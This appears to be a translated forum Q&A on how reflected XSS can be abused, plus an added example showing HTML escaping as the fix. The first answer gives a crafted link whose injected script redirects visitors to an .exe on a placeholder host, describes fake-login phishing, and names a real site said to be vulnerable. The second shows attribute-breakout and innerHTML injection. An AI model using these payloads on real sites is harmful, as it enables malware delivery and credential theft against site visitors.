How to damage a website using XSS / SQL injection?

4

I'm not a hacker, but I know some techniques. I'm training in security and I was really thoughtful about it. Every time I inject a script, it is an alert() , nothing dangerous for the host (for example). I do not have a website, so there is no way to forward cookies. What is the big risk of an XSS flaw on a site without a DB / login system? I have a real site here ( link ) that I found online. Yes, it is a potential flaw; however, the site does not have a login system, and I do not know of anything a black hat could do. What would "hackers / crackers" really do?

PS: To experiment with what I gave, I wrote <script>window.location = "https://www.google.com";</script> . I was forwarded to Google and returned to the page. Nothing happened.

asked by anonymous 21.06.2014 / 05:06

2 answers

10

There is no right way to exploit this. Basically you need to understand who accesses the site and what the focus of users is and often it is not enough to just use a technique, for example:

Let's assume that users of the site in question have an account on the XPTO Site. You could create a redirect or an iframe to a fake XPTO Site page with a form and copy this data. As the user entered the site that has the XSS problem on his own, he will not notice that he is being deceived. Another example would be to include a redirect to an .exe that targets the user's computer. This is commonly seen with bank pages or virtual wallets.

In the example in question the XSS is not persistent, that is, it is not saved inside the page; possibly there is no database. In this case the technique has to be adapted; it is common to pass the script through GET when the problem uses some form field.

<?php
// The GET parameter is echoed into the page without any HTML encoding; this is the reflected XSS.
$nome = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>

This is an example very similar to the mentioned site; the difference is that the information is passed through PHP's GET and not through the JavaScript prompt. In this case it would suffice to send users a link such as

http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>

A variant of this technique was widely used in the Orkut era. Google already used the "Com conta Google" login by default, but there was an additional parameter called redirect , and many sent this url with a redirect to a .exe or to a fake login page. I know the problem was not related to XSS but I think it is worth mentioning.

On the http://www.verinha.de site there is really an XSS problem; however, when analyzing the source code you can see that the result is not stored anywhere, and that it is not possible to enter the value through the url. In general there is no practical use in this case, at least not using this technique alone.

I hope I have contributed something.

21.06.2014 / 17:18
-2

I would think of something like this: let's say you have a text box to type something into, such as a username:

User Name : <input ... value="Nome">

Now, if you type something like this: "onmouseover=" event

<input ... value=" "onmouseover="evento ">

Or something like this: we have a text box, say in a browser; if we type something, it may show "No results were found for [searched word]". And if we type code, and the browser or other site does not find anything, then if it does not have any protection it can execute the script. Let's say this is the HTML:

<div>Não foi encontrado nenhum resultado para <script>alert("script")</script></div>

Example 2:

<script type="text/javascript">
function Pesquise(){
    /* Browser script or the search component of a site */
    /* The search term is written with innerHTML, so any HTML typed into the box is parsed
       as markup instead of being shown as text. (Browsers do not run a <script> element
       inserted this way, but any other injected markup is still rendered.) */
    document.getElementById("Result").innerHTML = "Não foi encontrado nenhum resultado para " + document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>
    
23.08.2017 / 16:33
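As an added example that is not part of either answer: the reflected pattern both answers show, the PHP `echo "Bem vindo $nome"` in the first and the `innerHTML` concatenation in the second, built as plain strings so it runs in Node without a DOM, beside the context-aware HTML encoding that neutralises it. The function names, the two review helpers and the sample inputs are constructed for this example and are not from the page or the site it discusses.

```javascript
// Added example, not code from either answer; function names and inputs are constructed.
// Encode the five characters that let untrusted text break out of an HTML
// text node or a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Text-node context: the unsafe form mirrors echo "Bem vindo $nome<br>".
function renderUnsafe(nome) { return 'Bem vindo ' + nome + '<br>'; }
function renderSafe(nome) { return 'Bem vindo ' + escapeHtml(nome) + '<br>'; }

// Attribute context: the value="..." box from the second answer.
function renderInputUnsafe(nome) { return '<input type="text" value="' + nome + '">'; }
function renderInputSafe(nome) { return '<input type="text" value="' + escapeHtml(nome) + '">'; }

// Review helper: every tag name the rendered HTML would create. Safe output
// must contain only the tags the template itself wrote.
function tagNames(html) {
  return [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
}

// Review helper: a minimal model of how a browser splits one tag into attribute
// names. Quote state is tracked so an encoded quote cannot end the value early;
// safe output must yield only the attributes the template itself wrote.
function attributeNames(tag) {
  const names = [];
  let quote = null;
  let name = '';
  for (const ch of tag.slice(1, -1)) {        // drop the surrounding < and >
    if (quote) { if (ch === quote) quote = null; continue; }
    if (ch === '"' || ch === "'") { quote = ch; continue; }
    if (/[\w-]/.test(ch)) { name += ch; continue; }
    if (ch === '=' && name) names.push(name.toLowerCase());
    name = '';
  }
  return names;
}

// Constructed inputs in the shape the two answers describe.
const TEXT_PAYLOAD = '<script>alert("x")</script>';
const ATTR_PAYLOAD = '" onmouseover="evento';

console.log(tagNames(renderUnsafe(TEXT_PAYLOAD)));            // [ 'script', 'script', 'br' ]
console.log(tagNames(renderSafe(TEXT_PAYLOAD)));              // [ 'br' ]
console.log(attributeNames(renderInputUnsafe(ATTR_PAYLOAD))); // [ 'type', 'value', 'onmouseover' ]
console.log(attributeNames(renderInputSafe(ATTR_PAYLOAD)));   // [ 'type', 'value' ]
```

The same encoding belongs on the server side of the PHP example (htmlspecialchars with ENT_QUOTES serves that role there); the point of the two helpers is that the fix is judged by what the browser would parse, not by whether an alert() appears.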